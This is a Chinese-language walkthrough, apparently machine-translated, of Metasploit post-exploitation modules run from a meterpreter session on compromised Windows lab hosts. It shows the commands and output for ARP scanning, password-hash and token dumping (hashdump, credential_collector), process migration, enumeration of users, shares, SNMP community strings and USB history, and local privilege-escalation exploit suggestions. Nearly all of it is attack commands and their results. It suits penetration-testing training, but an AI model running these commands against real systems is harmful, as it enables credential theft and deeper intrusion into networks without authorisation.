Metasploit提供了许多后期开发模块,可以在目标网络上收集更多信息。
arp_scanner
该“arp_scanner”后模块将执行ARP扫描给定的范围内通过受损主机。
meterpreter > run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24
[*] Running module against V-MAC-XP
[*] ARP Scanning 192.168.1.0/24
[*] IP: 192.168.1.1 MAC b2:a8:1d:e0:68:89
[*] IP: 192.168.1.2 MAC 0:f:b5:fc:bd:22
[*] IP: 192.168.1.11 MAC 0:21:85:fc:96:32
[*] IP: 192.168.1.13 MAC 78:ca:39:fe:b:4c
[*] IP: 192.168.1.100 MAC 58:b0:35:6a:4e:cc
[*] IP: 192.168.1.101 MAC 0:1f:d0:2e:b5:3f
[*] IP: 192.168.1.102 MAC 58:55:ca:14:1e:61
[*] IP: 192.168.1.105 MAC 0:1:6c:6f:dd:d1
[*] IP: 192.168.1.106 MAC c:60:76:57:49:3f
[*] IP: 192.168.1.195 MAC 0:c:29:c9:38:4c
[*] IP: 192.168.1.194 MAC 12:33:a0:2:86:9b
[*] IP: 192.168.1.191 MAC c8:bc:c8:85:9d:b2
[*] IP: 192.168.1.193 MAC d8:30:62:8c:9:ab
[*] IP: 192.168.1.201 MAC 8a:e9:17:42:35:b0
[*] IP: 192.168.1.203 MAC 3e:ff:3c:4c:89:67
[*] IP: 192.168.1.207 MAC c6:b3:a1:bc:8a:ec
[*] IP: 192.168.1.199 MAC 1c:c1:de:41:73:94
[*] IP: 192.168.1.209 MAC 1e:75:bd:82:9b:11
[*] IP: 192.168.1.220 MAC 76:c4:72:53:c1:ce
[*] IP: 192.168.1.221 MAC 0:c:29:d7:55:f
[*] IP: 192.168.1.250 MAC 1a:dc:fa:ab:8b:b
meterpreter >
checkvm
该“checkvm”模块,只需足够的检查是否遭到入侵的主机是虚拟机。该模块支持Hyper-V,VMWare,VirtualBox,Xen和QEMU虚拟机。
meterpreter > run post/windows/gather/checkvm
[*] Checking if V-MAC-XP is a Virtual Machine .....
[*] This is a VMware Virtual Machine
meterpreter >
credential_collector
该“credential_collector”模块收成密码哈希和令牌被感染的主机上。
meterpreter > run post/windows/gather/credentials/credential_collector
[*] Running module against V-MAC-XP
[+] Collecting hashes...
Extracted: Administrator:7bf4f254f224bb24aad3b435b51404ee:2892d23cdf84d7a70e2eb2b9f05c425e
Extracted: Guest:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
Extracted: HelpAssistant:2e61920ebe3ed6e6d108113bf6318ee2:5abb944dc0761399b730f300dd474714
Extracted: SUPPORT_388945a0:aad3b435b51404eeaad3b435b51404ee:92e5d2c675bed8d4dc6b74ddd9b4c287
[+] Collecting tokens...
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
NT AUTHORITY\ANONYMOUS LOGON
meterpreter >
dumplinks
该“dumplinks”模块解析在用户最近使用的文档可能是进一步的信息收集有用的.lnk文件。请注意,如下所示,我们首先需要在运行模块之前迁移到用户进程。
meterpreter > run post/windows/manage/migrate
[*] Running module against V-MAC-XP
[*] Current server process: svchost.exe (1096)
[*] Migrating to explorer.exe...
[*] Migrating into process ID 1824
[*] New server process: Explorer.EXE (1824)
meterpreter > run post/windows/gather/dumplinks
[*] Running module against V-MAC-XP
[*] Extracting lnk files for user Administrator at C:\Documents and Settings\Administrator\Recent\...
[*] Processing: C:\Documents and Settings\Administrator\Recent\developers_guide.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\documentation.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\Local Disk (C).lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\Netlog.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\notes (2).lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\notes.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\Release.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\testmachine_crashie.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\user manual.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\user's guide.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\{33D9A762-90C8-11d0-BD43-00A0C911CE86}_load.lnk.
[*] No Recent Office files found for user Administrator. Nothing to do.
meterpreter >
enum_applications
该“enum_applications”模块列举了安装在受损主机上的应用程序。
meterpreter > run post/windows/gather/enum_applications
[*] Enumerating applications installed on WIN7-X86
Installed Applications
======================
Name Version
---- -------
Adobe Flash Player 25 ActiveX 25.0.0.148
Google Chrome 58.0.3029.81
Google Update Helper 1.3.33.5
Google Update Helper 1.3.25.11
Microsoft .NET Framework 4.6.1 4.6.01055
Microsoft .NET Framework 4.6.1 4.6.01055
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 9.0.30729.4148
MySQL Connector Net 6.5.4 6.5.4
Security Update for Microsoft .NET Framework 4.6.1 (KB3122661) 1
Security Update for Microsoft .NET Framework 4.6.1 (KB3127233) 1
Security Update for Microsoft .NET Framework 4.6.1 (KB3136000v2) 2
Security Update for Microsoft .NET Framework 4.6.1 (KB3142037) 1
Security Update for Microsoft .NET Framework 4.6.1 (KB3143693) 1
Security Update for Microsoft .NET Framework 4.6.1 (KB3164025) 1
Update for Microsoft .NET Framework 4.6.1 (KB3210136) 1
Update for Microsoft .NET Framework 4.6.1 (KB4014553) 1
VMware Tools 10.1.6.5214329
XAMPP 1.8.1-0 1.8.1-0
[*] Results stored in: /root/.msf4/loot/20170501172851_pwk_192.168.0.6_host.application_876159.txt
meterpreter >
enum_logged_on_users
该“enum_logged_on_users”后模块与他们的SID一起返回当前和最近登录的用户列表。
meterpreter > run post/windows/gather/enum_logged_on_users
[*] Running against session 1
Current Logged Users
====================
SID User
--- ----
S-1-5-21-628913648-3499400826-3774924290-1000 WIN7-X86\victim
S-1-5-21-628913648-3499400826-3774924290-1004 WIN7-X86\hacker
[*] Results saved in: /root/.msf4/loot/20170501172925_pwk_192.168.0.6_host.users.activ_736219.txt
Recently Logged Users
=====================
SID Profile Path
--- ------------
S-1-5-18 %systemroot%\system32\config\systemprofile
S-1-5-19 C:\Windows\ServiceProfiles\LocalService
S-1-5-20 C:\Windows\ServiceProfiles\NetworkService
S-1-5-21-628913648-3499400826-3774924290-1000 C:\Users\victim
S-1-5-21-628913648-3499400826-3774924290-1004 C:\Users\hacker
meterpreter >
enum_shares
该“enum_shares”发布模块返回受损系统上已配置和最近使用的共享列表。
meterpreter > run post/windows/gather/enum_shares
[*] Running against session 3
[*] The following shares were found:
[*] Name: Desktop
[*] Path: C:\Documents and Settings\Administrator\Desktop
[*] Type: 0
[*]
[*] Recent Mounts found:
[*] \\192.168.1.250\software
[*] \\192.168.1.250\Data
[*]
meterpreter >
enum_snmp
该“enum_snmp”模块将枚举SNMP服务配置的目标,如果存在的话,包括社区字符串。
meterpreter > run post/windows/gather/enum_snmp
[*] Running module against V-MAC-XP
[*] Checking if SNMP is Installed
[*] SNMP is installed!
[*] Enumerating community strings
[*]
[*] Comunity Strings
[*] ================
[*]
[*] Name Type
[*] ---- ----
[*] public READ ONLY
[*]
[*] Enumerating Permitted Managers for Community Strings
[*] Community Strings can be accessed from any host
[*] Enumerating Trap Configuration
[*] No Traps are configured
meterpreter >
hashdump
该“hashdump”发布模块将使用注册表转储受感染主机上的本地用户帐户。
meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...
Administrator:500:7bf4f254b222ab21aad3b435b51404ee:2792d23cdf84d1a70e2eb3b9f05c425e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:2e61920ebe3ed6e6d108113bf6318ee2:5abb944dc0761399b730f300dd474714:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:92e5d2c675bed8d4dc6b74ddd9b4c287:::
meterpreter >
usb_history
该“usb_history”模块枚举感染的系统上的USB驱动器的历史。
meterpreter > run post/windows/gather/usb_history
[*] Running module against V-MAC-XP
[*]
C: Disk ea4cea4c
E: STORAGE#RemovableMedia#8&3a01dffe&0&RM#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
A: FDC#GENERIC_FLOPPY_DRIVE#6&1435b2e2&0&0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
D: IDE#CdRomNECVMWar_VMware_IDE_CDR10_______________1.00____#3031303030303030303030303030303030303130#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
[*] Kingston DataTraveler 2.0 USB Device
=====================================================================================
Disk lpftLastWriteTime Thu Apr 21 13:09:42 -0600 2011
Volume lpftLastWriteTime Thu Apr 21 13:09:43 -0600 2011
Manufacturer (Standard disk drives)
ParentIdPrefix 8&3a01dffe&0 ( E:)
Class DiskDrive
Driver {4D36E967-E325-11CE-BFC1-08002BE10318}\0001
meterpreter >
local_exploit_suggester
该“local_exploit_suggester”,或Lester ,扫描包含在Metasploit的本地漏洞的系统。然后,根据结果提出建议,并显示漏洞的位置以便更快访问。
msf > use post/multi/recon/local_exploit_suggester
msf post(local_exploit_suggester) > show options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 2 yes The session to run this module on.
SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
msf post(local_exploit_suggester) > run
[*] 192.168.101.129 - Collecting local exploits for x86/windows...
[*] 192.168.101.129 - 31 exploit checks are being tried...
[+] 192.168.101.129 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 192.168.101.129 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 192.168.101.129 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 192.168.101.129 - exploit/windows/local/ms15_004_tswbproxy: The target service is running, but could not be validated.
[+] 192.168.101.129 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[*] Post module execution completed